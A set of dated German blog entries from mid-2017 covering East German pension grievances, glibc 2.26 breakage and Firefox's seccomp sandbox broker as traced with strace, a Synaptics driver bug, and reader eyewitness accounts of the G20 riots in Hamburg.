[l] So langsam geht die Aufarbeitung der Zeit direkt nach dem Mauerfall los. Und es ist echt schlimm.
Seitdem trifft Köpping Bergleute und Krankenschwestern, deren Rentenbeiträge aus der DDR heute nicht mehr anerkannt werden, sie sitzt mit Künstlern zusammen, die nach der Wiedervereinigung in Existenznot gerieten, spricht mit in der DDR geschiedenen Frauen, die heute vielfach in Altersarmut leben, weil es keinen Versorgungsausgleich gab. In Leipzig erzählen ihr DDR-Eisenbahner, wie ein Werk nach dem anderen im Osten dichtgemacht wurde, nachdem die Bundesbahn übernahm. Noch mehr aber regt sie auf, dass ihre Betriebsrenten, für die sie Beiträge zahlten, „einfach weggewischt“ wurden. Stattdessen verkaufte die Bundesbahn die Filetgrundstücke der Reichsbahn in Ost-Berlin und füllte mit dem Erlös ihre gähnend leere Pensionskasse auf. Das Nachsehen hatten die Ost-Bahner, die keinen Anspruch darauf haben. „Die Renten der West-Bahner werden auch zu unseren Lasten gezahlt“, sagt ein Mitarbeiter und beklagt zugleich, in der mehrheitlich westdeutschen Gewerkschaft keinerlei Unterstützung zu finden.
Und das, so die These, ist der eigentliche Nährboden für Pegida. Mit Ausländern hat das nicht viel zu tun.

Sat Aug 5 2017

[l] Ich baue mir unter Linux meinen Firefox ganz gerne selbst. Früher habe ich mir immer laut fluchend die Tarballs gezogen, dann bin ich dazu übergegangen, in den sauren Apfel zu beißen und halt das Repository mit den Sourcen immer unausgepackt auf Platte zu haben und per Mercurial Updates zu ziehen. Das klappt auch ganz gut.
Allerdings gibt es halt beim Selberbauen immer mal wieder Stress.
Eine Weile gab es Konflikte, weil Firefox auf einer über 10 Jahre alten Version von GNU autoconf bestand, die ich nicht hatte.
Dann gab es Ärger, weil Firefox H.264-Playback (Youtube und co) nur abspielen wollte, wenn man gstreamer installierte — aber es bestand auf einer 10 Jahre alten Gammelversion, die schon längst nicht mehr gewartet wurde.
Inzwischen hat Firefox auf ffmpeg umgestellt, und das tat auch eine Weile ganz gut, aber vor ein paar Tagen stellte es die Arbeit ein. Ich bin dann auf die Vorversion und zurück und habe mir das für das Wochenende vorgenommen. Jetzt ist Wochenende, und ich habe erstmal die neue glibc 2.26 installiert (die endlich reallocarray von OpenBSD übernommen hat, und einen per-Thread malloc-Cache hat, was die Performance massiv verbessern sollte in Programmen mit mehreren Threads).
Das brach mir dann erstmal alles.
Die Shell konnte plötzlich nicht mehr meinen Usernamen herausfinden, screen wurde konkreter und sagte, getpwuid könne meinen User nicht auflösen. Sowas gibt es bei glibc häufiger, weil die gerne mal Dinge als "deprecated" markieren, für die es keinen Ersatz gibt. Zum Beispiel pt_chown vor einer Weile. Das war halt unsicher, also haben sie es weggemacht. pt_chown ist das Vehikel, über das die einschlägigen libc-Routinen (grantpt) ein PTY allozieren, und es liegt in /usr/libexec, wenn es denn überhaupt liegt. Und plötzlich kam mein X nicht mehr hoch, weil mein X solange läuft, wie mein Terminal in X läuft, und das konnte kein PTY mehr allozieren.
Später hat glibc dann Sun RPC rausgeschmissen, und dann ließ sich mount(8) nicht mehr bauen. Ja super. Und jetzt haben sie nsl für obsolet erklärt und in nss ausgemistet (NIS rausgekantet und so). Gut, NIS verwende ich nicht. Als das nicht ging, habe ich halt neu gebaut, diesmal mit --enable-obsolete-nsl, aber das brauchte auch nichts. Stellt sich raus: in meine /etc/nsswitch.conf stand drin:
```
passwd: compat
shadow: compat
group: compat
```
Und das sorgte dafür, dass die glibc libnss_compat.so oder so zu laden versuchte, und das gibt es nicht mehr. Die glückbringende Änderung war dann:
```
passwd: files
shadow: files
group: files
```
Seufz. Bei solchen Gelegenheiten bin ich ja immer froh, dass mein getty und mein login gegen dietlibc gelinkt sind, und für Notfälle noch eine diet-shell rumliegt. So komm ich auch nach solchen glibc-Sabotageakten immer noch irgendwie ans System ran und kann Dinge fixen.
Aber eigentlich wollte ich ja von Firefox erzählen. Nach dem glibc-Update baut auch Firefox nicht mehr, weil glibc in sys/ucontext.h eine struct von struct ucontext zu struct ucontext_t umbenannt hat. Ich bin mir sicher, dass es da Gründe für gab, aber meine Phantasie reicht nicht, um mir welche auszudenken. Was für ein Scheiß ist DAS denn bitte?! Firefox hat einen Crash Reporter, und der will halt in diesen Strukturen herumfuhrwerken, weil man das tun muss, wenn man sehen will, in welchem Zustand das Programm beim Crashen war.
Gut, nur ein Dutzend Dateien musste ich anfassen, dann baute Firefox wieder. Aber H.264 war immer noch kaputt.
Und die Story ist richtig interessant, daher will ich sie hier mal bloggen. Wenn man so ein Problem hat, dann ist unter Linux eine der ersten und besten Debugmöglichkeiten, dass man strace benutzt. Programme unter Linux laufen im User Space, und die interagieren mit dem Kernel über Syscalls. strace fängt die Syscalls ab und gibt ihre Argumente und Ergebnisse aus. Hier ist ein Beispiel:
```
$ strace /opt/diet/bin/cat true.c
execve("/opt/diet/bin/cat", ["/opt/diet/bin/cat", "true.c"], [/* 60 vars */]) = 0
arch_prctl(ARCH_SET_FS, 0x7fff5e690f70) = 0
open("true.c", O_RDONLY)                = 3
read(3, "int main() {\n  return 0;\n}\n", 65536) = 27
write(1, "int main() {\n  return 0;\n}\n", 27int main() {
  return 0;
}
) = 27
read(3, "", 65536)                      = 0
close(3)                                = 0
exit(0)                                 = ?
+++ exited with 0 +++
```
Hier sieht man ganz gut, was cat tut. execve gehört noch nicht zu dem cat selber, das ist der Aufruf von dem cat. arch_prctl ist ein Implementationsdetail, das man auf x86_64 macht, um thread local storage einzurichten (die libc weiß an der Stelle nicht, dass cat das nicht benutzt). strace auf Firefox ist natürlich viel umfangreicher, aber mit ein bisschen Geduld kann man da trotzdem sehen, was passiert, bzw. was nicht passiert. Und zwar sah ich das hier:
```
 7194  openat(AT_FDCWD, "/usr/lib64/libavcodec-ffmpeg.so.57", O_RDONLY|O_CLOEXEC) = 257
 7194  --- SIGSYS {si_signo=SIGSYS, si_code=SYS_SECCOMP, si_errno=EEXIST, si_call_addr=0x7fc218252840, si_syscall=__NR_openat, si_arch=AUDIT_ARCH_X86_64} ---
 7194  socketpair(AF_UNIX, SOCK_SEQPACKET, 0, [39, 40]) = 0
 7194  sendmsg(36, {msg_name=NULL, msg_namelen=0, msg_iov=[{iov_base="\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0", iov_len=16}, {iov_base="/usr/lib64/libavcodec-ffmpeg.so."…, iov_len=35}, {iov_base=NULL, iov_len=0}], msg_iovlen=3, msg_control=[{cmsg_len=20, cmsg_level=SOL_SOCKET, cmsg_type=SCM_RIGHTS, cmsg_data=[40]}], msg_controllen=24, msg_flags=0}, MSG_NOSIGNAL <unfinished …>
 7196  <… recvmsg resumed> {msg_name=NULL, msg_namelen=0, msg_iov=[{iov_base="\0\0\0\0\0\0\10\0\0\0\0\0\0\0\0\0", iov_len=16}, {iov_base="/usr/lib64/libavcodec-ffmpeg.so."…, iov_len=8194}], msg_iovlen=2, msg_control=[{cmsg_len=20, cmsg_level=SOL_SOCKET,cmsg_type=SCM_RIGHTS, cmsg_data=[66]}], msg_controllen=24, msg_flags=MSG_CMSG_CLOEXEC}, MSG_CMSG_CLOEXEC) = 51
 7194  <… sendmsg resumed> )           = 51
 7196  openat(AT_FDCWD, "/usr/lib64/libavcodec-ffmpeg.so.57", O_RDONLY|O_NOCTTY|O_CLOEXEC <unfinished …>
 7194  close(40 <unfinished …>
 7196  <… openat resumed> )            = 95
 7194  <… close resumed> )             = 0
 7196  sendmsg(66, {msg_name=NULL, msg_namelen=0, msg_iov=[{iov_base="\0\0\0\0", iov_len=4}], msg_iovlen=1, msg_control=[{cmsg_len=20, cmsg_level=SOL_SOCKET, cmsg_type=SCM_RIGHTS, cmsg_data=[95]}], msg_controllen=24, msg_flags=0}, MSG_NOSIGNAL <unfinished …>
 7194  recvmsg(39,  <unfinished …>
 7196  <… sendmsg resumed> )           = 4
 7194  <… recvmsg resumed> {msg_name=NULL, msg_namelen=0, msg_iov=[{iov_base="\0\0\0\0", iov_len=4}], msg_iovlen=1, msg_control=[{cmsg_len=20, cmsg_level=SOL_SOCKET, cmsg_type=SCM_RIGHTS, cmsg_data=[40]}], msg_controllen=24, msg_flags=MSG_CMSG_CLOEXEC}, MSG_CMSG_CLOEXEC) = 4
```
Die Ausgabe ist ein bisschen verwirrend mit dem unfinished und resumed; das kommt daher, dass Firefox mehr als einen Prozess/Thread aufmacht, und die miteinander reden, und ich alle von denen auf einmal beobachte. Aber mal grob: Prozess A ruft openat(AT_FDCWD,…) auf, das ist äquivalent zu open(…). Kriegt als Ergebnis 257 und direkt ein Signal SIGSYS mit si_code SYS_SECCOMP.
Das ist ziemlich coole Scheiße, weil das genau das ist, was ich auf dem 32c3 in meinem Vortrag "Check your privileges" als Broker-Architektur vorgestellt hatte. Die haben das aber nicht über Überladen von openat gemacht, sondern die haben das so gemacht, dass SECCOMP nicht den Prozess abbricht sondern dieses Signal schickt. Das Signal fangen sie dann ab, und der Handler von dem Signal kann dann nachvollziehen, was der Code zu tun versucht hatte, in diesem Fall openat, und das anders lösen — nämlich über sendmsg an den Broker, wie wir in dem strace schön sehen können. Der Broker macht recvmsg, kriegt die Anfrage (und wir sehen in den Daten von dem sendmsg auch schön den Dateinamen), und öffnet die dann. Die Zahl am Anfang ist übrigens die PID bzw. Thread-ID.
Der Broker macht dann selber nochmal openat, hat keinen SECCOMP-Filter installiert, das openat läuft durch, und dann schickt der Broker mit dem zweiten sendmsg oben den Deskriptor 95 zurück an den anfragenden Prozess in der Sandbox. Der kriegt das dann in dem recvmsg als Deskriptor 40 reingereicht (Deskriptoren sind immer relativ zum Prozess, daher findet hier im Kernel eine Übersetzung statt). Das ist mal echt coole Scheiße, und ich bin einigermaßen schockiert, dass Firefox so Bleeding-Edge-Kram überhaupt implementiert hat. Sehr cool!
Warum ich das hier alles erwähne: weil das bei mir auf die Nase fiel, denn zum Abspielen von H.264 lädt Firefox libavcodec von ffmpeg, und ffmpeg ist gegen einen Haufen Codecs und Libraries gelinkt, und die liegen bei mir eben nicht alle in /usr/lib64, sondern beispielsweise liegt libva in /usr/X11R7/lib64 (libva macht hardware-assistierte Dekodierung und Anzeige von u.a. H.264-Videos). Und es stellt sich raus, dass Firefox in dem Broker eine Liste von erlaubten Verzeichnissen hat, aus denen Dateien geöffnet werden können, und die wird nicht aus /etc/ld.so.conf oder so generiert, sondern die ist hardkodiert im Quellcode. Falls jemand mal selbst gucken will: Das ist in security/sandbox/linux/broker/SandboxBrokerPolicyFactory.cpp (nach policy->AddDir gucken).
Nachdem ich da meine Pfade eingetragen habe, kann der Firefox ffmpeg laden — aber das Video immer noch nicht spielen. Das sei jetzt korrupt, sagt er. Ist es natürlich nicht. Mist. Na mal schauen. Fortschritt ist immer nur ein Schritt zur Zeit.
Update: Ein Einsender zur glibc-Situation:
Das Update habe ich für unsere cross-gebauten Umgebungen diese Woche auch gemacht. Mal so ein paar Sachen, die aufgefallen sind:
- gcc 5.4 baut dann nicht mehr (ucontext_t, auch ein paar Stack-Sachen), betrifft auch neuere Versionen von gcc
- iproute2 4.11 baut auch nicht mehr (4.12 schon, also mir egal). IIRC haben sie irgendwo vergessen stdint.h für UINT16_MAX einzubinden, und das muss vorher zufällig über irgendeinen anderen Header mit reingekommen sein (also ganz klar nicht die Schuld von glibc)
- gdb 8.0 baut nicht mehr auf x64 (ARM geht), irgendwas mit putc(), das nur ein Argument bekommt oder so.
Ganz großes Kino.
In der Tat. o_O

Fri Aug 4 2017

[l] Oh gucke mal, der nächste "gut gemeinte" Internetpranger fährt runter. (Siehe auch).
Dieser Internetpranger richtete sich voll gerechten Zorns gegen die fiesen Schweine-Arschlöcher, die intersektionalen Feminismus nicht für inhärent unhinterfragbar axiomatisch gottgegeben die beste Idee seit geschnitten Brot hielten. Hey, der da hinten wagt es, anderer Meinung als ich zu sein! Da mach ich doch nen Internetpranger auf! Das hat schon immer toll funktioniert! Für alle Außenstehenden räumt das immerhin ganz schnell alle Zweifel aus, welche Seite die fanatischen Spinner sind.
Ich sage das übrigens als jemand, der auch mal einen Internet-Pranger betrieben hat. Vor vielen Jahren. Das war ein Archiv im Web von Usenet-Postings (die aus Prinzip öffentlich sind, vom Poster selbst veröffentlicht; damit rationalisierte ich mir das damals zurecht). Als dann der zweite ankam, der einen Job nicht gekriegt hat, weil die Sachbearbeiter auf der anderen Seite seinen Namen gegoogelt und seine Ergüsse in meinem Archiv gefunden haben, habe ich das Archiv weggemacht. Die Idee war ja nicht, Idioten das Leben kaputt zu machen, sondern es den Leuten zu ermöglichen, aus anderer Leute Fehler zu lernen, nicht nur aus ihren eigenen. Aber es stellt sich raus: Niemand benutzt sowas für sowas.
Ich habe inzwischen ein paar Mal die These gehört, dass das Problem ist, dass die Technik zu niederschwellig geworden ist inzwischen. Früher, als nur Nerds mit IQ 130 es in BBSsen geschafft haben, da war die Welt noch in Ordnung!1!! Stimmt nicht. Ich könnte da ein paar Geschichten erzählen aus meiner BBS-Zeit. Hey, vielleicht sollte ich das mal machen, in einer Alternativlos-Folge oder so. Die bittere Lektion ist jedenfalls: Es reicht ein Arschloch in einer Gruppe, um den ganzen gemeinsamen Raum zu vergiften. Und so hochschwellig kann man den Zugang gar nicht machen, dass es da nicht mindestens ein Arschloch rein schafft. Zensur oder "Moderation" von Idioten ändert nur die Art der Vergiftung, nicht, dass der Raum vergiftet ist.

Fri Jul 28 2017

[l] Trump hat ein Bild gemalt und das wird jetzt versteigert.
Ich fühlte mich spontan an den Postillon erinnert. Vielleicht sollte man da ein paar Milliardäre zum Mitbieten anregen, damit der lieber eine Kunstkarriere einschlägt.

Wed Jul 26 2017

[l] Ich hatte ja vor einer Weile geschrieben, dass ich ein Schenker-Notebook habe, mit dem ich auch soweit zufrieden war. Bin ich auch größtenteils immer noch, aber es gibt doch einen Fehler, den ich hier mal zu Protokoll geben will, weil es sich, wenn man nach dem Symptomen googelt, um einen Serienfehler zu handeln scheint.
Schenker-Notebooks sind, wie auch diverse andere Notebooks auch, ursprünglich Barebones von Clevo. Die Symptome sind spontane Bluescreens unter Windows in SynTP.sys mit Fehler DRIVER_IRQL_NOT_LESS_OR_EQUAL (gelegentlich auch ein anderer Fehler aber auch in SynTP.sys).
Das passiert im Allgemeinen während hoher Systembelastung, beispielsweise während Videospielen.
Das Internet ist voll von Fehlerbeschreibungen dieser Art, einige wenige (gefühlt die Ausnahme, aber das kann auch an meinem Sample liegen) auch bei anderen Herstellern als Clevo. Lösungen scheint es keine zu geben. Viele Foren schlagen dann so die üblichen hilflosen Verdächtigen vor, GPU-Treiber updaten, Antivirus deinstallieren, Patches einspielen, blablah, das ist alles Bullshit. Also bis auf Antivirus wegmachen jetzt :-)
Das kann man auch nicht auf ein Hardwareproblem schieben, weil das ein völlig eindeutiger Programmierfehler im Treiber ist. Wer sich mit Treiberprogrammierung unter Windows ein bisschen auskennt: Das passiert, wenn ein Treiber in einem kritischen Pfad auf Speicher zugreift, der aus dem Speicherpool mit Paging kommt statt aus dem Non-Paged Pool. Speicher aus dem Paging-Pool kann vom Kernel rausgeswappt werden, und der Zugriff darauf führt dann dazu, dass die Speicherseite nachgeladen werden muss. Unter Linux ist von Kerneltreibern allozierter Speicher grundsätzlich nicht swapbar, unter Windows aus historischen Gründen doch. Nun ist das nicht generell verboten, im Windows-Kernel auf page-baren Speicher zuzugreifen, aber es gibt eben Situationen, in denen es nicht geht. Zum Beispiel wenn man gerade einen Interrupt bearbeitet, oder von jemanden aufgerufen wird, der einen Interrupt bearbeitet. Weil während dieser Operation ein zentraler Mutex im Kernel gehalten wird, würde das Auslösen von Paging zu einem Deadlock führen. Wenn der Kernel das also feststellt, gibt es sofort einen Bluescreen.
Dieser Bug kann auch auftreten, wenn ein Treiber in einer Interrupt-Routine auf völlig ungemappten Speicher zugreift, also einem wilden Zeiger hinterherrennt oder so.
Es gibt, kurz gesagt, keine Entschuldigung für dieses Verhalten. Nein, da ist nicht "das Mainboard zu warm geworden" oder "die Hardware hat ne Macke". Das ist ein Programmierfehler im Treiber. Gut, außer das Mainboard ist so doll zu warm geworden, dass der RAM Mist zurückliefert, aber dann ist auch alles andere zu spät und das würde nicht reproduzierbar im SynTP.sys auftreten.
Weil dieses Problem bei diversen Laptops seit vielen Jahren auftritt, und Synaptics offensichtlich nicht in der Lage ist, einen Treiber ohne diesen Fehler auszuliefern, werde ich in Zukunft vom Erwerb von Laptops mit Synaptics-Touchpad absehen.
Unter Linux ist übrigens alles in Ordnung mit dem Touchpad. Es ist nur der Windows-Treiber von Symaptics, der hier braun ist.
Kann es sein, dass ein Hardware-Problem zu dem speziellen Timing führt, das diesen Bug erst triggert? Ja, theoretisch. Aber ob das jetzt in der Praxis auftritt oder nicht — das ist ein Programmierfehler im Symaptics-Treiber. Schenker kann dafür nichts (außer dass sie Synaptics-Produkte ausliefern). Das einzige, was ich daher an dieser Stelle von Schenker erwarten würde, ist dass sie ab jetzt an ihre Produkte klar ranschreiben, ob da Synaptics-Produkte verbaut wurden oder nicht.
Das Touchpad im Gerätemanager zu deaktivieren hilft übrigens nicht.
Den Treiber manuell zu deinstallieren hilft auch nicht, weil Windows den sofort aus dem Windows Update Repository neu nachinstalliert. Das selbe passiert, wenn man den offiziellen Treiber von der Webseite von Synaptics lädt und zu installieren versucht.
Update: Ein hilfreicher Hinweis kam noch rein: Dass das möglicherweise von einem Filtertreiber ausgelöst wird. Ein Filtertreiber ist ein Treiber, der sich sozusagen zwischen einen anderen Treiber und den Kernel hängt, das kennt man hauptsächlich bei Filesystemen. Bei Clevo-Laptops gibt es aber einen Filtertreiber für Hotkey-Handling. Das ist denkbar, dass der sich vor den Synaptics-Treiber hängt und den kaputtmacht. Zwischen Kernel-Komponenten gibt es keinen Speicherschutz wie zwischen verschiedenen Programmen im Userspace. Wenn der Schuld ist, trifft Synaptics natürlich keine Schuld und ich ziehe meine Kritik zurück. Ich probiere das mal aus, diese Filtertreiber nicht zu laden.

Wed Jul 19 2017

[l] Überraschung 1: Netanyahu hat Orban in Ungarn besucht.
Überraschung 2: Orban hat mit deutlichen Worten die Kollaboration von Ungarns damaliger Regierung mit den Nazis und dem Holocaust kritisiert.
Der ungarische Ministerpräsident Viktor Orban hat die Mitwirkung Ungarns am Holocaust mit deutlichen Worten verurteilt. "Ungarn hat ein Verbrechen begangen, als es, anstelle die jüdische Gemeinschaft zu verteidigen, mit den Nazis kollaboriert hat" […]
"Jede ungarische Regierung hat die Pflicht, all ihre Bürger zu schützen, unabhängig von ihrem Erbe", sagte Orban. Im Zweiten Weltkrieg habe sich Ungarn nicht daran gehalten. Er habe gegenüber Netanyahu deutlich gemacht, dass so etwas nie wieder passieren dürfe.

Sun Jul 16 2017

[l] Hier noch eine G20-Einsendung mit einem Blickwinkel, der bisher gar nicht geäußert wurde:
Ich war vor Ort. Das, was am stärksten bei mir hängen geblieben ist, ist die autofreie Innenstadt. Das einzige Hindernis beim Fahrradfahren durch die Stadt war die gefühlt 2km lange Critical Mass Veranstaltung, die für mindestens fünf Stunden (frühester bis spätester Zeitpunkt bei dem wir die getroffen haben) unterwegs war.
Ich fand es etwas schade, dass die Live-Schalte zu Assange bei der Diem25 Veranstaltung aufgrund eines (geplanten?) Feueralarms in der Uni nicht stattfand, aber dafür ging die Veranstaltung draußen bei wunderschönem Wetter und unter drei Helikoptern entspannt weiter. Außerdem fand ich es schön, wie ca. 500 Menschen auf der Reeperbahn bei der Technomusik von einem Party-Jeep und der Partybeleuchtung von zwei Wasserwerfern friedlich gefeiert haben.
Ganz ehrlich? Ich war vor Ort und habe von Ausschreitungen mehr über die Medien gehört als ich persönlich gesehen habe, obwohl ich ständig zwischen Landungsbrücken und Schanze (Fr. Abend um 20:00, da war alles friedlich) unterwegs war. Am Samstag war eine sehr schöne Demo mit fast 100.000 Menschen und sehr kreativen Verkleidungen und Wagen.
Warum schenken wir den Law and Order Deppen und gewalttätigen Idioten eigentlich so viel Aufmerksamkeit? Für mich war das Wochenenende zumindest super und ich bin sehr froh, dabei gewesen zu sein. Und das nicht nur, um die Mediendarstellung mit meiner eigenen Wahrnehmung vergleichen zu können.
Update: Eine andere Einsendung widerspricht:
Dein Einsender hat Recht. Um 20.00 Uhr war hier alles friedlich auf der Schanze. Da sind Demoausläufer hier angekommen. Und es war so, wie es dann immer ist. Irgendwann rabatzt wer leicht rum, und die Polizei räumt das Gelände (das im Normalfall sehr übergriffig, aber das ist eine andere Frage). Gegen 20.00 sind die hier einmal durch.
Dann kam der nicht-friedliche Teil. Danach wurde es unangenehm gewaltvoll für die Anwohner und Anwohnerinnen.
Wir sind hier Auseinandersetzungen zwischen Demo-Teilnehmern, -Teilnehmerinnen und der Polzei gewohnt. Aber im Normalfall streiten die sich, und wir sind nur da.
Die letzten Mai-Demos und die letzten Schanzenfeste liefen im Wesentlichen auf ein "18-25-jährige Männer stellen sich den Wasserwerfer in den Weg" hinaus. Das nennen wir hier Wasserspiele. Wir sind uns einig, dass sich es dabei um Pinneberger Krawalltouristen handelt. (Dabei sind bestimmt auch junge Herren aus Quickborn dabei.)
Das letzte Mal, das es hier richtig eskaliert ist, war der 21.12.2013.
Diese Auseinandersetzung war sehr gewaltvoll. Selbst diese Gewalt hat sich zwischen Polizei und den Krawallos abspielt. Wir stellen da im Wesentlichen nur "den Begegnungsraum".
Da brennen zwar auch mal Mülltonnen, aber die sind so schnell wieder ausgepiescht vom Wasserwerfer, dass die TV-Leute sich echt beeilen müssen, um zu guten Feuerbildern zu kommen.
Am G20-Freitag hatte die Polizei ggen 20.00 Uhr geräumt, sich am Pferdemarkt wieder aufgebaut und hat sich vollkommen atypisch verhalten. Im Normallfall lassen die sich auf ein Katz-und-Mausspiel mit den Krawalltouristen ein.
Das Ergebnis ist: es gibt nur noch kontrollierte Zu- und Abgänge aufs Gelände, und wenn etwas brennt, brennt es für circa zwei Minuten. Barrikaden wachsen nicht in der Höhe, sondern werden direkt vom Räumpanzer abgeräumt.
In diesem Fall habt die Polizei keine Präsenz gezeigt.
Um 22.00 Uhr kam ich persönlich über die Susannenstraße ins Schulterblatt rein. Die Susannenstraße war voller Partyvolk (Freitag, Schanze, normal). Das war auch die Ansage des Polizisten am Schlump, den ich gefragt habe, wie die Lage sei: "Sie kennen das ja. Schanze und Demo. Im Wesentlichen so wie immer." Er murmelte noch etwas von "Molotowcocktail über Funk gehört". Aber das konnte er nicht einordnen.
Zu diesem Zeitpunkt war das Schulterblatt nicht mehr friedlich. Dennoch gab es friedliche Ecken. Die Susannenstraße war stärker belebt als sonst. Aber das Partyvolk saß noch draußen, trank Wein und aß. Genauso wie auf der Piazza, dem oberen Teil des Schulterblatts. Auf dieser Höhe brannten zwei Barrikaden. Davor saß das Partyvolk, trank Wein und aß.
Davor waren viele Leute auf der Straße. Eine Mischung aus Partyvolk und den Krawalltouristen.
Aber "unten" waren die Krawallos (viele von den "Pinnebergern" und auch einige anders "professionell" Vermummte) unterwegs. Die Barrikaden brannten und wurden gespeist vom REWE, von Budni oder zum Beispiel aus der Backfactory (in der Presse werden immer erstere genannt, aber hier ist noch mehr kaputt gegangen).
Ungefähr um diese Zeit stürmten einige die Haspa und setzten diese innen in Brand. Das Feuer wurde für lange Zeit nicht gelöscht.
Für uns hier war neu, dass die Auseinandersetzung das Umfeld mit einbezog. Ich finde persönlich diese Wasserspiele müßig und frage mich recht häufig, ob wir nicht einen anderen Weg des Testoteronabbaus etablieren könnten. Ehrlich gesagt, finde ich es ziemlich bekloppt, dass dafür unsere Polizei herhalten muss.
Während ich in Demonstrationen einen Ausdruck von politischem Standpunkt und Debatte sehe, konnte ich noch nie eine politische Meinungsbildung in den "Wasserspielen" erkennen.
Ich habe dabei einen hohen Anspruch an die Polizei, dass diese sich gerade in solchen Situationen angemessen verhält. Dieser Anspruch wird in Hamburg — zumindest vor meinem Wohnzimmerfenster — regelmäßig unterlaufen.
Am letzten Freitag war ich Augenzeugin eines brennenden (oberen) Schulterblatts. Ungefähr alle zehn Meter brannte eine Barrikade. Ich sahe diverse Plünderungen und Leute, die an Haustüren schepperten und auch Gewalt gegenüber den Anwohnern und Anwohnerinnen androhten. So sind etliche brennende Gegenstände gegen Fenster geflogen.
Im Ergebnis kannst Du hier Leuten finden, die traumatisiert sind. Die immer noch im Panikmodus sind. Es ist hier eine intensive Debatte, wie "man" sich korrekt in so einem Falle verhalten sollte. Weil gelernt ist ja: wir sind alleine, die Polizei kommt nicht.
Gestern fing im zu einem 1/4 wieder nutzbaren Budni (mit super kleinem Sortiment) eine Anwohnerin an zu weinen, als sie realisierte, dass der Budni noch nicht wieder komplett auf ist. Sie zitterte, und es fühlte sich an, als würde die Angst vom G20-Freitag bei ihr wieder ankommen. Sie sagte immer nur: "Das ist Krieg!"
Ich gehe davon, dass Krieg schlimmer ist, aber das zeigt vielleicht, wie sehr hier die Leute zum Teil erschüttert sind. Und das deren Schmerz, Angst + Panik nicht vorbei ist.
Wir sind hier im Normalfall genervt von den Auseinandersetzungen. Wir können ordentlich rumschimpfen über Krawalltouristen, Polizei und Journalisten / Journalistinnen. Der eine oder andere kann dem etwas Politisches abgewinnen. Dann können wir vortrefflich darüber debattieren, ob das so ist oder nicht.
Journalisten und Journalistinnen haben in den letzten Jahre immer mal "Krawalle" hergeschrieben, wenn echt nichts los war. Außer Testosteronabbau.
Aber der Freitag war anders. Der war von vielleicht 21.00 - 24.00 Uhr nicht friedlich.
Denn die draußen bedrohten uns. Und sie waren viele. Gewalttätig. Es mischten sich professionell Vermummte, die Pinneberger Krawalltouristen und das Partyvolk zu einer Bedrohung auf, die hier mehr als einen Anwohner und mehr als eine Anwohnerin echt erschüttert hat.
Nochmal: wir kennen Auseinandersetzungen zwischen Krawalltouristen + Polizei. Was wir nicht kennen, sind persönliche Bedrohungen.
Gegen 24.00 Uhr hat die Polizei das Schulterblatt geräumt. Auch das hat sie atypisch getan. Die Zuwegungen hat sie wiederum nicht blockiert. Im Ergebnis hat dann die Altonaer Straße noch richtig einen mitgekriegt.
Insofern: ja, Dein Einsender hat Recht: es war um 20.00 Uhr friedlich. *Wir* haben auch nie behauptet, dass es hier tagelang Ausschreitungen gegeben hätte.
Ich konstatiere für mich, dass es drei Stunden gegeben hat, in der sich die Polizei atypisch verhalten hat. Und die von vielen Anwohnern und Anwohnerinnen als sehr ohnmächtig erlebt wurden.
Da stellen sich Fragen wie:
- Gehe ich nach unten und verteidige ich das Haus aktiv?
- Gehe ich nach unten und helfe den Gastronomen, das entsprechende Etablissement zu "räumen" und dann zu schließen?
- Packe ich meinen Notkoffer und gehe ich?
- Packe ich meinen Notkoffer, wecke ich meine Kinder auf, setze die aufs Sofa und warte ich, ob was zum Fenster reinfliegt, um dann zu fliehen?
- Gehe ich schlafen?
Ich kenne für jede dieser Optionen mindestens eine Person, die diese Option bejaht hat.
In der Presse heißt es, dass Polizisten + Polizistinnen den Einsatz verweigert hätten. Mit Hinweis auf "Gefahr für Leib + Leben". Diese Erklärung ist für Leute, die am oberen Ende wohnen, schwer aushaltbar. Die konnten sich nicht aussuchen, ob die in den Einsatz gehen. Sie waren mittendrinnen.
Das hier häufig geäußerte Gefühl ist, im Stich gelassen worden zu sein.
Ich bin froh, dass Dein Einsender sehr deutlich gemacht hat, dass es um 20.00 Uhr friedlich gewesen sei. Die Unterstellung, es sei die gesamte Zeit nichts los gewesen, wäre nicht auszuhalten. Es würde nicht anerkennen, was uns passiert ist.
Ich habe Theorien dazu, warum die Polizei sich derart atypisch verhalten hat. Ich hoffe sehr, dass die da auch sauber drauf gucken werden. Ich würde das ungerne wiederholt sehen.
Nachtrag: Vielleicht zeigt diese Mail auch, was das Problem ist.
Für mich ist es gerade ganz schwer anzuerkennen, dass hier Sachen über die G20-Tage auch echt gut gelaufen sind. Es fällt mir auch schwer, sauber zu benennen, was außer diesem atypischen Polizeiverhalten noch mistig war.
Ich kann friedliche Demos nicht gut sehen. Das verschwindet hinter meinem Wahrnehmungsfilter.
Hat es gegeben, total kluge und beeindruckende Demos zum Beispiel Attac und coole Kunstperfermances gegeben (oder waren 1000 Gestalten + Blockade-Yoga auch Demos)? Ich finde es eigntlich beeindruckend, dass am Sonnabend hier 50K (Polizei) - 75K (Veranstalter) Leute draußen zum Demonstrieren waren. Ich finde "Lieber tanz ich als G20" gut und wichtig.
Es hat hier nach meinem Wissensstand mehr als 60 Demos gegeben. Und große Teile scheint die Polizei gut begleitet zu haben.
Bestimmt haben die G20-Leute selbst irgendetwas gesagt, was deren Ergebnis war (könnte ich gerade nicht sagen, außerhalb meiner Wahrnehmung)
Für mich reduziert sich aber G20 auf drei gewaltvolle Stunden voller Angst + Ohnmacht. Und was daran schwer auszuhalten ist, dass diese Angst + Ohnmacht medial keinen Ausdruck findet.
Die Deutungsdebatte findet halt ohne uns Anwohner + Anwohnerinnen statt.
Vielleicht kann ich die Auseinandersetzung selbst besser führen, wenn ich aus diesen sehr basalen Gefühlen raus bin.

Sat Jul 15 2017

[l] "Self-driving Taxis Will Become the Most Disgusting Spaces on Earth"
Leuchtet mir ein, die Vorhersage. Ohne Fahrer wird es noch weniger Zurückhaltung geben. Und wer soll da dann saubermachen? Wer soll erkennen, dass saubergemacht werden muss?

Wed Jul 12 2017

[l] Bug des Tages: In der glibc ist getpid() plötzlich voll langsam!
Bonus: Einziger Betroffener ist systemd, der Bug wurde von Lennart Pöttering aufgemacht.
[l] Heute morgen hat das Bundesverfassungsgericht vorgezogen in der Causa Gaby Weber entschieden. Gaby hat einen Film gemacht, der die Hintergründe erklärt (ca eine halbe Stunde).
Leider hat das Gericht eine Formalie gefunden, mit der sie vermeiden konnten, sich grundsätzlich äußern zu müssen. Gaby hätte die Klage nicht an das Bundesarchiv sondern an das Kanzleramt richten müssen, sagen sie. Gaby ist, wenig überraschend, nicht erfreut:
